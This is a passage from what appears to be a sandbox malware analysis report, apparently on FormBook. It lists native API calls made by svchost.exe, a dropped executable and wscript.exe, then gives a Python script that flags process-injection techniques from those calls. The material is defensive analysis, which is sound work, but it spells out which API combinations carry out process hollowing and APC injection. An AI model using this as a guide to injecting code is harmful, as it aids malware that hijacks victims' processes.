          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A310 NtEnumerateValueKey,LdrInitializeThunk,5_2_02F6A310
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A800 NtSetValueKey,LdrInitializeThunk,5_2_02F6A800
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A6A0 NtCreateSection,LdrInitializeThunk,5_2_02F6A6A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A610 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_02F6A610
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A750 NtCreateFile,LdrInitializeThunk,5_2_02F6A750
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6ACE0 NtCreateMutant,LdrInitializeThunk,5_2_02F6ACE0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A480 NtMapViewOfSection,LdrInitializeThunk,5_2_02F6A480
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A470 NtSetInformationFile,LdrInitializeThunk,5_2_02F6A470
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A410 NtQueryInformationToken,LdrInitializeThunk,5_2_02F6A410
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A560 NtQuerySystemInformation,LdrInitializeThunk,5_2_02F6A560
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A540 NtDelayExecution,LdrInitializeThunk,5_2_02F6A540
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A2F0 NtQueryInformationFile,5_2_02F6A2F0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6BA30 NtSetContextThread,5_2_02F6BA30
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A220 NtWaitForSingleObject,5_2_02F6A220
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A370 NtQueryInformationProcess,5_2_02F6A370
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6B0B0 NtGetContextThread,5_2_02F6B0B0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A6D0 NtCreateProcessEx,5_2_02F6A6D0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A650 NtQueueApcThread,5_2_02F6A650
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A780 NtOpenDirectoryObject,5_2_02F6A780
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A720 NtResumeThread,5_2_02F6A720
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A710 NtQuerySection,5_2_02F6A710
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A700 NtProtectVirtualMemory,5_2_02F6A700
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A4A0 NtUnmapViewOfSection,5_2_02F6A4A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6B470 NtOpenThread,5_2_02F6B470
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A460 NtOpenProcess,5_2_02F6A460
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A430 NtQueryVirtualMemory,5_2_02F6A430
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6B410 NtOpenProcessToken,5_2_02F6B410
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A5F0 NtReadVirtualMemory,5_2_02F6A5F0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A5A0 NtWriteVirtualMemory,5_2_02F6A5A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6BD40 NtSuspendThread,5_2_02F6BD40
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A520 NtEnumerateKey,5_2_02F6A520
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00416B50 NtCreateFile,5_2_00416B50
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00416C00 NtReadFile,5_2_00416C00
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00416C80 NtClose,5_2_00416C80
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00416D30 NtAllocateVirtualMemory,5_2_00416D30
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00416B4D NtCreateFile,5_2_00416B4D
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00416C7A NtClose,5_2_00416C7A
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B2323 NtUnmapViewOfSection,14_2_022B2323
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B2B39 NtResumeThread,14_2_022B2B39
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B6BE1 NtMapViewOfSection,14_2_022B6BE1
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B51A7 NtQueryInformationProcess,14_2_022B51A7
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B31A6 NtQueryInformationProcess,14_2_022B31A6
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B47C4 NtQueryInformationProcess,14_2_022B47C4
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA2D0 NtClose,LdrInitializeThunk,15_2_00ADA2D0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA240 NtReadFile,LdrInitializeThunk,15_2_00ADA240
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA3E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_00ADA3E0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA360 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_00ADA360
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA4A0 NtUnmapViewOfSection,LdrInitializeThunk,15_2_00ADA4A0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA480 NtMapViewOfSection,LdrInitializeThunk,15_2_00ADA480
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA410 NtQueryInformationToken,LdrInitializeThunk,15_2_00ADA410
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA5F0 NtReadVirtualMemory,LdrInitializeThunk,15_2_00ADA5F0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA560 NtQuerySystemInformation,LdrInitializeThunk,15_2_00ADA560
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA540 NtDelayExecution,LdrInitializeThunk,15_2_00ADA540
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA6A0 NtCreateSection,LdrInitializeThunk,15_2_00ADA6A0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA610 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_00ADA610
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA720 NtResumeThread,LdrInitializeThunk,15_2_00ADA720
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA700 NtProtectVirtualMemory,LdrInitializeThunk,15_2_00ADA700
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA750 NtCreateFile,LdrInitializeThunk,15_2_00ADA750
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADB0B0 NtGetContextThread,15_2_00ADB0B0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA800 NtSetValueKey,15_2_00ADA800
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA2F0 NtQueryInformationFile,15_2_00ADA2F0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA220 NtWaitForSingleObject,15_2_00ADA220
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADBA30 NtSetContextThread,15_2_00ADBA30
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA260 NtWriteFile,15_2_00ADA260
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA3D0 NtCreateKey,15_2_00ADA3D0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA310 NtEnumerateValueKey,15_2_00ADA310
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA370 NtQueryInformationProcess,15_2_00ADA370
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA350 NtQueryValueKey,15_2_00ADA350
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADACE0 NtCreateMutant,15_2_00ADACE0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA430 NtQueryVirtualMemory,15_2_00ADA430
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADB410 NtOpenProcessToken,15_2_00ADB410
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA460 NtOpenProcess,15_2_00ADA460
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADB470 NtOpenThread,15_2_00ADB470
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA470 NtSetInformationFile,15_2_00ADA470
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA5A0 NtWriteVirtualMemory,15_2_00ADA5A0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA520 NtEnumerateKey,15_2_00ADA520
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADBD40 NtSuspendThread,15_2_00ADBD40
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA6D0 NtCreateProcessEx,15_2_00ADA6D0
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA650 NtQueueApcThread,15_2_00ADA650
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA780 NtOpenDirectoryObject,15_2_00ADA780
          Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 15_2_00ADA710 NtQuerySection,15_2_00ADA710
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1ACE0 NtCreateMutant,LdrInitializeThunk,18_2_04A1ACE0
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A560 NtQuerySystemInformation,LdrInitializeThunk,18_2_04A1A560
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A610 NtAdjustPrivilegesToken,LdrInitializeThunk,18_2_04A1A610
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A2D0 NtClose,LdrInitializeThunk,18_2_04A1A2D0
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A3E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_04A1A3E0
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A360 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_04A1A360
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A4A0 NtUnmapViewOfSection,18_2_04A1A4A0
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A480 NtMapViewOfSection,18_2_04A1A480
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A430 NtQueryVirtualMemory,18_2_04A1A430
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A410 NtQueryInformationToken,18_2_04A1A410
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1B410 NtOpenProcessToken,18_2_04A1B410
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A460 NtOpenProcess,18_2_04A1A460
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1B470 NtOpenThread,18_2_04A1B470
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A470 NtSetInformationFile,18_2_04A1A470
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A5A0 NtWriteVirtualMemory,18_2_04A1A5A0
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A5F0 NtReadVirtualMemory,18_2_04A1A5F0
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A520 NtEnumerateKey,18_2_04A1A520
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1BD40 NtSuspendThread,18_2_04A1BD40
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A540 NtDelayExecution,18_2_04A1A540
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A6A0 NtCreateSection,18_2_04A1A6A0
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A6D0 NtCreateProcessEx,18_2_04A1A6D0
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A650 NtQueueApcThread,18_2_04A1A650
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A780 NtOpenDirectoryObject,18_2_04A1A780
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A720 NtResumeThread,18_2_04A1A720
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A700 NtProtectVirtualMemory,18_2_04A1A700
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A710 NtQuerySection,18_2_04A1A710
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A750 NtCreateFile,18_2_04A1A750
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1B0B0 NtGetContextThread,18_2_04A1B0B0
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A800 NtSetValueKey,18_2_04A1A800
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A2F0 NtQueryInformationFile,
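The listing above is the analyzer's raw per-process inventory of native (Nt*) functions, and on its own it is hard to read: the injection behaviours the report flags elsewhere (process hollowing, thread-context modification, APC queueing, mapping a section into another process) are each a small set of these calls occurring together in one process. The Python below is an added example for this page, not code from the Joe Sandbox report or from any FormBook tooling. It parses lines in the report's "Source: ... Code function: ..." shape, groups the APIs by process, matches each process against editor-chosen API sets for those behaviours (reporting what is still missing on a partial match), and lists function addresses that appear in more than one process, which is what a copied image looks like in this kind of listing (the report shows 00416B50 NtCreateFile and 00416C00 NtReadFile both in the sample and in svchost.exe). The regex, the technique sets and the reading of the leading number in an identifier like 3_2_00AAA650 as a process index are assumptions; the embedded lines are an excerpt of the listing above, so a process with no full match here is only unmatched within the excerpt.

```python
"""Triage a sandbox "Code function" listing: group native API calls per process and match
each process against injection-technique API sets. Added example, not the report's code."""
import re
from collections import defaultdict

# Assumed line shape (copied text, not a Joe Sandbox schema):
# "Source: <image path> Code function: <proc>_<pass>_<addr> <Api>,<Api>,...,<proc>_<pass>_<addr>"
LINE_RE = re.compile(
    r"Source:\s*(?P<path>.+?)\s*Code function:\s*"
    r"(?P<proc>\d+)_(?P<pass>\d+)_(?P<addr>[0-9A-Fa-f]{8})\s+(?P<calls>.*)$"
)
ID_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]{8}$")  # the identifier repeated at line end

# Editor-chosen API sets for behaviours named in the report's signature list. A full hit
# needs every API of a set in the same process; partial coverage is reported as well.
TECHNIQUES = {
    "process hollowing": {"NtUnmapViewOfSection", "NtAllocateVirtualMemory",
                          "NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread"},
    "thread context modification": {"NtOpenThread", "NtGetContextThread", "NtSetContextThread"},
    "APC queue injection": {"NtOpenThread", "NtQueueApcThread"},
    "cross-process section mapping": {"NtOpenProcess", "NtCreateSection", "NtMapViewOfSection"},
}

# Excerpt of the listing above; the last line is truncated in the report and kept that way.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_2_00AAA650 NtQueueApcThread,3_2_00AAA650
Source: C:\Users\user\Desktop\xg28sL5JDm.exe Code function: 3_1_00416B50 NtCreateFile,3_1_00416B50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A360 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02F6A360
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A6A0 NtCreateSection,LdrInitializeThunk,5_2_02F6A6A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A480 NtMapViewOfSection,LdrInitializeThunk,5_2_02F6A480
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6BA30 NtSetContextThread,5_2_02F6BA30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6B0B0 NtGetContextThread,5_2_02F6B0B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A650 NtQueueApcThread,5_2_02F6A650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A720 NtResumeThread,5_2_02F6A720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A4A0 NtUnmapViewOfSection,5_2_02F6A4A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6B470 NtOpenThread,5_2_02F6B470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A460 NtOpenProcess,5_2_02F6A460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_02F6A5A0 NtWriteVirtualMemory,5_2_02F6A5A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00416B50 NtCreateFile,5_2_00416B50
Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B2323 NtUnmapViewOfSection,14_2_022B2323
Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe Code function: 14_2_022B2B39 NtResumeThread,14_2_022B2B39
Source: C:\Windows\SysWOW64\wscript.exe Code function: 18_2_04A1A2F0 NtQueryInformationFile,
""".strip().splitlines()


def parse_line(line):
    """Return {'path','proc','pass','addr','apis'} for one report entry, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    # Drop the repeated identifier and any empty token left by a truncated line.
    apis = [t for t in m["calls"].split(",") if t and not ID_RE.match(t)]
    return {"path": m["path"], "proc": m["proc"], "pass": m["pass"],
            "addr": m["addr"].upper(), "apis": apis}


def inventory(lines):
    """Map (process index, image path) -> set of native functions seen in that process."""
    seen = defaultdict(set)
    for entry in filter(None, map(parse_line, lines)):
        seen[(entry["proc"], entry["path"])].update(entry["apis"])
    return seen


def match_techniques(apis):
    """Per technique: (full hit, sorted list of APIs still missing from this process)."""
    result = {}
    for name, needed in TECHNIQUES.items():
        missing = sorted(needed - apis)
        result[name] = (not missing, missing)
    return result


def triage(lines):
    return {key: match_techniques(apis) for key, apis in inventory(lines).items()}


def full_hits(lines):
    """(process index, image path) -> sorted names of fully matched techniques."""
    return {key: sorted(n for n, (hit, _) in res.items() if hit)
            for key, res in triage(lines).items()}


def shared_addresses(lines):
    """(address, function) pairs seen in more than one process index, with those indices."""
    where = defaultdict(set)
    for entry in filter(None, map(parse_line, lines)):
        for api in entry["apis"]:
            where[(entry["addr"], api)].add(entry["proc"])
    return {k: sorted(v) for k, v in where.items() if len(v) > 1}


if __name__ == "__main__":
    for (proc, path), names in sorted(full_hits(SAMPLE_LINES).items()):
        print(f"process {proc} {path}: {', '.join(names) or 'no full match in excerpt'}")
    for (addr, api), procs in sorted(shared_addresses(SAMPLE_LINES).items()):
        print(f"address {addr} ({api}) seen in processes {', '.join(procs)}")
```

The parser also accepts the unspaced form some copies of the report produce ("...svchost.exeCode function: ..."), since the path match is lazy and the separator may be empty. On the excerpt, svchost.exe fully matches all four sets while the dropped sdv88p2lg.exe (process 14) only shows a partial hollowing set, which is a prompt to look at the rest of that process's listing rather than a verdict.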